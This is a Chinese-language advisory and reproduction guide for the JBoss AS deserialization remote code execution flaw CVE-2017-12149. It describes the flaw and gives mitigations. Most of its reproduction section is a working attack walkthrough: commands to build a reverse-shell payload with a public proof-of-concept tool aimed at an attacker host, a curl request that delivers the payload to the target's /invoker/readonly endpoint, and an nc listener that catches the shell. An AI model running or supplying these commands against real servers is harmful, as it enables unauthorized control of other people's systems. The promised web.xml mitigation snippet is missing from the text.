漏洞描述

2017年9月14日，国家信息安全漏洞共享平台（CNVD）收录了JBOSS Application Server反序列化命令执行漏洞（CNVD-2017-33724，对应CVE-2017-12149），远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞细节和验证代码已公开，近期被不法分子利用出现大规模攻击尝试的可能性较大。

JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可，可以在任何商业应用中免费使用，2006年，JBoss被Redhat公司收购。

2017年8月30日，厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中，其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化，导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响，攻击者利用该漏洞无需用户验证在系统上执行任意命令，获得服务器的控制权。CNVD对该漏洞的综合评级为“高危”。

漏洞复现

1.环境搭建

1)JBOSS下载地址：http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip

2)解压后配置JBOSS环境变量，并启动JBOSS。访http://ip:8080 出现jboss安装完成。

2.漏洞验证

github下载POC：https://github.com/joaomatosf/JavaDeserH2HC

本地JBOSS地址:192.168.135.4:8080

攻击机kali:192.168.135.100

使用方法:

攻击机下载执行执行生成二进制payload文件：

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
  
 #修改接收shell的主机ip和端口

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.135.100:1234 (IP:端口)

curl向被攻击服务器发送攻击payload：
curl http://192.168.135.4:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

攻击机开启监听
 nc -vv -l -p 1234

影响范围

该漏洞影响5.x和6.x版本的JBOSSAS。目前评估潜在受影响主机数量超过5000台。

防护建议

升级到JBOSS AS7

临时解决方案：

1. 不需要 http-invoker.sar 组件的用户可直接删除此组件。

2. 添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中：

3. 用于对 http invoker 组件进行访问控制。